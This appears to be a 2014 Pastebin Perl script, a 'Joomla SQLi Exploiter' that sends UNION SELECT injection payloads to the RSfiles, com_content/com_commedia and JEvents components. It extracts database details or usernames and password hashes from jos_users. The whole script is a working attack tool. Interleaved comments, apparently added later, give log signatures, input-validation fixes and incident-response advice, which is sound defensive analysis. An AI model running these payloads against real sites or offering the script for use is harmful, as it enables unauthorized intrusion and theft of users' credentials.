KilledSecurity

joomla SQLi Exploiter v.1 By Mr.GladiatorX207

Oct 23rd, 2014
Perl 4.47 KB | None | 0 0
  1.  
  2.     #!/usr/bin/perl
  3.     use IO::Socket::INET;
  4.     use LWP::UserAgent;
  # Banner, argument handling and HTTP client setup shared by the three request
  # templates further down. The script has no `use strict` / `use warnings`, so
  # every variable assigned here is a package global.
  5.     system("clear");
  6.     print "------------------------------------------------------------------------\n";
  7.     print "########################################################################\n";
  8.     print "#                         Joomla SQli 1.0 Exploiter                    #\n";
  9.     print "#                      *Coded By Mauritania Attacker*                  #\n";
  10.     print "#                       *Modifed By Mr.GladiatorX207*                  #\n";
  11.     print "########################################################################\n";
  12.     print "------------------------------------------------------------------------\n\n";
  # First argument: base URL of the site. Second argument: which request
  # template to run (1, 2 or 3; it is compared numerically further down).
  13.     $target = $ARGV[0];
  14.     $component = $ARGV[1];
  # Missing or empty arguments print the usage text and exit with status 1.
  15.     if($target eq '' || $component eq '')
  16.     {
  17.     print "Usage: ./exploit.pl <target> <Method Number> \n";
  18.     print "-----------------------------------\n";
  19.     print " Available Exploits :              \n";
  20.     print " 1- Joomla Component RSfiles       \n";
  21.     print " 2- Joomla General Sql Injection   \n";
  22.     print " 3- Joomla Component JEvents       \n";
  23.     print "-----------------------------------\n";
  24.     print " Example: ./exploit.pl http://www.site.com/ 1 \n\n";
  25.     exit(1);
  26.     }
  27.      
  # Forensic note: this two-argument open creates (or truncates) contents11.txt
  # in the current working directory. Its result is not checked, and nothing in
  # the visible listing writes to or closes FILE, so the file is only an on-disk
  # trace on the machine the script was run from, not a results log.
  28.     open(FILE, "> contents11.txt");
  29.      
  # Prepends "http://" when that literal does not occur anywhere in the argument
  # (the pattern is unanchored).
  30.     if($target !~ /http:\/\//)
  31.     {
  32.     $target = "http://$target";
  33.     }
  34.      
  35.     sleep 1.5;
  # Detection note: every request below is sent with this one fixed User-Agent,
  # which names a long-outdated Firefox 7 build. It is a useful pivot when
  # reviewing access logs next to the URL patterns, but a weak indicator by itself.
  36.     $agent = LWP::UserAgent->new();
  37.     $agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1');
  38.      
  39.      
  # Template 1: a single GET against the com_rsfiles "agreement" view.
  # Defensive reading: the `cid` parameter carries a UNION SELECT written with
  # mixed-case keywords and `/**/` or `+` in place of spaces (a common way to slip
  # past naive keyword filters), asking the database for user(), database() and
  # version(). Casting `cid` to an integer or binding it as a query parameter on
  # the server side removes this class of flaw.
  # Log signature: `option=com_rsfiles` together with `union` / `select` in any
  # letter case inside `cid`.
  40.     if($component == 1)
  41.     {
  42.     $host = $target . "/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--";
  43.     print " . . Exploiting Component RSfiles on target $target . . \n\n";
  44.     sleep 1;
  # The HTTP status is never checked; the body is used whatever the server returned.
  45.     $req = $agent->request(HTTP::Request->new(GET=>$host));
  46.     $content = $req->content;
  # Any run of 32 hex characters in the response is reported as a "password".
  # The query above selects user(), database() and version(), not a password
  # column, so a hit only shows that such a string was present in the page.
  47.     if($content =~ /([0-9a-fA-F]{32})/)
  48.     {
  49.     $password = $1;
  50.     print "[+] Password found --> $password :) .\n\n";
  51.     sleep 1;
  52.     }
  53.     else
  54.     {
  55.     print "[-] Password not found :( . \n\n";
  56.     }
  57.     }
  58.      
  59.      
  60.      
  61.      
  62.      
  63.      
  64.      
  65.      
  # Template 2: two GET requests, sent in turn with a one-second pause before
  # each. Both ask for username and password from a hard-coded `jos_users` table
  # (presumably the stock Joomla table prefix of that era; confirm for the site
  # under review).
  # Log signature: `option=com_content` with `union select` appended to `Itemid`,
  # and `option=com_commedia` with `union all select` inside `id`. Both
  # parameters are numeric ids in normal use, so rejecting non-numeric values
  # for them is the matching input check.
  66.     if($component == 2)
  67.      
  68.     {
  69.     print " . . Exploiting General Sql Injection on target $target . . \n\n";
  70.     sleep 1;
  71.     print " . . Trying different types of injection for this component . . wait please . . \n\n";
  72.     $host = $target . "/index.php?option=com_content&amp;task=blogcategory&amp;id=60&amp;Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/*";
  73.     $host1 = $target . "/index.php?option=com_commedia&format=raw&task=down&pid=59&id=999999.9 union all select (select concat(0x3c757365723e, username,0x3c757365723e3c706173733e,count(*),password,0x3c706173733e) from jos_users),null--";
  74.      
  75.      
  76.      
  77.     @hosts = ($host,$host1);
  78.     foreach $hos(@hosts)
  79.     {
  80.     sleep 1;
  # The HTTP status is not checked; the body is inspected whatever the server returned.
  81.     $req = $agent->request(HTTP::Request->new(GET=>$hos));
  82.     $content = $req->content;
  # 32 hex characters is the length of an MD5 digest; the first such run in the
  # page is printed as the password. Incident-response note: if access logs show
  # one of these requests answered with a body containing such a digest, treat
  # the site's stored password hashes as disclosed and reset the accounts.
  83.     if($content =~ /([0-9a-fA-F]{32})/)
  84.     {
  85.     $password = $1;
  86.     print "Password found --> $password :) . \n\n";
  87.     sleep 1;
  88.     }
  89.     else
  90.     {
  91.     print "Password not found :( . \n\n";
  92.     sleep 1;
  93.     }
  94.     }
  95.     }
  96.      
  97.      
  98.      
  99.      
  100.      
  101.      
  102.      
  103.      
  104.      
  105.      
  # Template 3: three GET requests against com_events, differing only in the
  # `task` / `Itemid` / `month` parameters. Each puts a ten-column UNION SELECT
  # reading username and password from a hard-coded `jos_users` table into the
  # `year` parameter.
  # Defensive reading: a value other than a plain number in `year` for
  # `option=com_events` is the log signature, and validating `year` as an
  # integer on the server side is the matching input check.
  106.     if($component == 3)
  107.      
  108.     {
  109.     print " . . Exploiting Component JEvents on target $target . . \n\n";
  110.     sleep 1;
  111.     print " . . Trying different types of injection for this component . . wait please . . \n\n";
  112.     $host = $target . "/index.php?option=com_events&task=view_detail&year=union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--";
  113.     $host1 = $target . "/index.php?option=com_events&task=view_year&Itemid=50&year=union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--";
  114.     $host2 = $target . "/index.php?option=com_events&Itemid=34&task=view_year&month=11&year=union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--";
  115.      
  116.      
  117.     @hosts = ($host,$host1,$host2);
  # One request per URL, each preceded by a one-second pause, all with the same
  # User-Agent: in access logs a run shows up as a short burst from one client.
  118.     foreach $hos(@hosts)
  119.     {
  120.     sleep 1;
  # The HTTP status is not checked; the body is inspected whatever the server returned.
  121.     $req = $agent->request(HTTP::Request->new(GET=>$hos));
  122.     $content = $req->content;
  # The first run of 32 hex characters in the page (the length of an MD5 digest)
  # is printed as the password; nothing ties the match to the injected query, so
  # any such string in the response counts as a hit.
  123.     if($content =~ /([0-9a-fA-F]{32})/)
  124.     {
  125.     $password = $1;
  126.     print "Password found --> $password :) . \n\n";
  127.     sleep 1;
  128.     }
  129.     else
  130.     {
  131.     print "Password not found :( . \n\n";
  132.     sleep 1;
  133.     }
  134.     }
  135.     }